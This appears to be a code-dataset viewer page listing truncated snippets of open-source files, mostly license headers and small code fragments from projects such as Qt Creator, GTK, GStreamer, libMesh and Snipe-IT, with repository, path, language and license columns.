##
# distributions.py: module for probability distributions.
##
# © 2017, Chris Ferrie (csferrie@gmail.com) and
# Christopher Granade (cgranade@cgranade.com).
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided t... | csferrie/python-qinfer | src/qinfer/distributions.py | Python | agpl-3.0 | 51,767 |
<?php
// autoload_psr4.php @generated by Composer
$vendorDir = dirname( dirname( __FILE__ ) );
$baseDir = dirname( $vendorDir );
return array();
| KWZwickau/KREDA-Sphere | Library/MOC-V/Component/Mail/Vendor/EdenPhpMail/1.0.3-Master/vendor/composer/autoload_psr4.php | PHP | agpl-3.0 | 148 |
<?php
return array(
'activated_help_text' => '该用户可以登录',
'activated_disabled_help_text' => '您无法编辑自己帐户的激活状态。',
'assets_user' => '分配给:name的资产',
'bulk_update_warn' => '您即将编辑user_count用户的属性。请注意,您不能使用此表单更改您自己的用户属性,必须单独对您自己的用户信息进行编辑。',
'bulk_update_help' => '此表单允许您一次更新多个用户。仅填写您需要更改的字段。留的空的任何字段将保持不变... | dkmansion/snipe-it | resources/lang/zh-CN/admin/users/general.php | PHP | agpl-3.0 | 1,553 |
<!DOCTYPE HTML>
<html>
<head>
<title>Minimal RWD</title>
<script type="text/javascript" src="../../../tests/qunit/qunit-bootstrap.js"></script>
<script type="text/javascript" src="../../../mwEmbedLoader.php"></script>
<script type="text/javascript" src="../../../docs/js/doc-bootstrap.js"></script>
<body>
<br>
... | alexedm/test-mwEmbed | modules/KalturaSupport/tests/RWDMinimal.html | HTML | agpl-3.0 | 2,944 |
/*
Copyright (C) 2014 Omega software d.o.o.
This file is part of Rhetos.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (... | bantolov/Rhetos | CommonConcepts/Plugins/Rhetos.Dom.DefaultConcepts/HierarchyItem.cs | C# | agpl-3.0 | 1,050 |
// The libMesh Finite Element Library.
// Copyright (C) 2002-2019 Benjamin S. Kirk, John W. Peterson, Roy H. Stogner
// This library is free software; you can redistribute it and/or
// modify it under the terms of the GNU Lesser General Public
// License as published by the Free Software Foundation; either
// version ... | 90jrong/libmesh | src/fe/fe_hermite_shape_0D.C | C++ | lgpl-2.1 | 2,915 |
/**************************************************************************
**
** This file is part of Qt Creator
**
** Copyright (c) 2011 Nokia Corporation and/or its subsidiary(-ies).
**
** Contact: Nokia Corporation (info@qt.nokia.com)
**
**
** GNU Lesser General Public License Usage
**
** This file may be used unde... | pcacjr/qt-creator | src/plugins/designer/formwindowfile.h | C | lgpl-2.1 | 3,135 |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_51) on Thu Feb 20 17:52:48 PST 2014 -->
<title>Facebook.DialogListener</title>
<meta name="date" content="2014-02-20">
<link rel="style... | greenaddress/WalletCordovaFdroid | plugins/it.greenaddress.cordova/facebook-android-sdk-3.7/docs/com/facebook/android/Facebook.DialogListener.html | HTML | lgpl-2.1 | 10,128 |
/*
* BioJava development code
*
* This code may be freely distributed and modified under the
* terms of the GNU Lesser General Public Licence. This should
* be distributed with the code. If you do not have a copy,
* see:
*
* http://www.gnu.org/copyleft/lesser.html
*
* Copyright for t... | paolopavan/biojava | biojava-structure/src/main/java/demo/DemoDomainsplit.java | Java | lgpl-2.1 | 2,371 |
/****************************************************************************
**
** Copyright (C) 2011 Nokia Corporation and/or its subsidiary(-ies).
** All rights reserved.
** Contact: Nokia Corporation (qt-info@nokia.com)
**
** This file is part of the Qt Designer of the Qt Toolkit.
**
** $QT_BEGIN_LICENSE:LGPL$
** G... | kobolabs/qt-everywhere-4.8.0 | tools/designer/src/lib/sdk/abstractdialoggui_p.h | C | lgpl-2.1 | 5,241 |
/* GTK - The GIMP Toolkit
* Copyright (C) 2000 Red Hat, Inc.
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2 of the License, or (at your option) any later versi... | community-ssu/gtk | gtk/gtkmessagedialog.h | C | lgpl-2.1 | 4,621 |
/* GStreamer
* Copyright (C) 2005 Sebastien Moutte <sebastien@moutte.net>
* Copyright (C) 2007 Pioneers of the Inevitable <songbird@songbirdnest.com>
* Copyright (C) 2010 Fluendo S.A. <support@fluendo.com>
*
* gstdirectsoundsink.c:
*
* This library is free software; you can redistribute it and/or
* modify it under the ... | ahmedammar/platform_external_gst_plugins_good | sys/directsound/gstdirectsoundsink.c | C | lgpl-2.1 | 25,292 |
/*
* Copyright (c) 2006-2011 Nuxeo SA (http://nuxeo.com/) and others.
*
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* which accompanies this distribution, and is available at
* http://www.eclipse.org/legal/epl-v10.html
... | nuxeo-archives/nuxeo-features | nuxeo-automation/nuxeo-automation-client/src/main/java/org/nuxeo/ecm/automation/client/model/IdRef.java | Java | lgpl-2.1 | 690 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PerlWwwRobotrules(PerlPackage):
"""Database of robots.txt-derived permissions"""
home... | iulian787/spack | var/spack/repos/builtin/packages/perl-www-robotrules/package.py | Python | lgpl-2.1 | 637 |
/*
* Copyright (c) 2007 Pentaho Corporation. All rights reserved.
* This software was developed by Pentaho Corporation and is provided under the terms
* of the GNU Lesser General Public License, Version 2.1. You may not use
* this file except in compliance with the license. If you need a copy of the license... | dianhu/Kettle-Research | src/org/pentaho/di/trans/steps/xmlinputsax/XMLInputSaxFieldRetriever.java | Java | lgpl-2.1 | 10,129 |
/**************************************************************************
**
** Copyright (C) 2013 Openismus GmbH.
** Authors: Peter Penz (ppenz@openismus.com)
** Patricia Santana Cruz (patriciasantanacruz@gmail.com)
** Contact: http://www.qt-project.org/legal
**
** This file is part of Qt Creator.
**
** Com... | richardmg/qtcreator | src/plugins/autotoolsprojectmanager/makefileparserthread.h | C | lgpl-2.1 | 5,324 |
/**
******************************************************************************
* @file stm32f303x8.h
* @author MCD Application Team
* @version V2.3.0
* @date 29-April-2015
* @brief CMSIS STM32F303x8 Devices Peripheral Access Layer Header File.
*
* This file contains:
* ... | katezilla/RIOT | cpu/stm32f3/include/stm32f303x8.h | C | lgpl-2.1 | 913,290 |
#import <Foundation/Foundation.h>
#import <CoreData/CoreData.h>
FOUNDATION_EXTERN NSString * const MITCoreDataThreadLocalContextKey;
@interface CoreDataManager : NSObject
@property (nonatomic, readonly) NSManagedObjectModel *managedObjectModel;
@property (nonatomic, readonly) NSManagedObjectContext *managedObjectCont... | MIT-Mobile/MIT-Mobile-for-iOS | Common/CoreData/Manager/CoreDataManager.h | C | lgpl-2.1 | 2,673 |
/*
* Hibernate OGM, Domain model persistence for NoSQL datastores
*
* License: GNU Lesser General Public License (LGPL), version 2.1 or later
* See the lgpl.txt file in the root directory or <http://www.gnu.org/licenses/lgpl-2.1.html>.
*/
package org.hibernate.ogm.test.integration.jboss.model;
import javax.persis... | uugaa/hibernate-ogm | integrationtest/redis/src/test/java/org/hibernate/ogm/test/integration/jboss/model/PhoneNumber.java | Java | lgpl-2.1 | 794 |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
</head>
<body>
This package contains common types and constants for the AIS service APIs.
<p>Copyright statement is specified <a href="#Copyrights">here</a>. </p>
TODO: add package description here
<h2><a name="Copyrights"></a>OWNERSHIP OF ... | kenzaburo/OpenSaf-FrameWork | java/ais_api/src/org/saforum/ais/package.html | HTML | lgpl-2.1 | 1,094 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.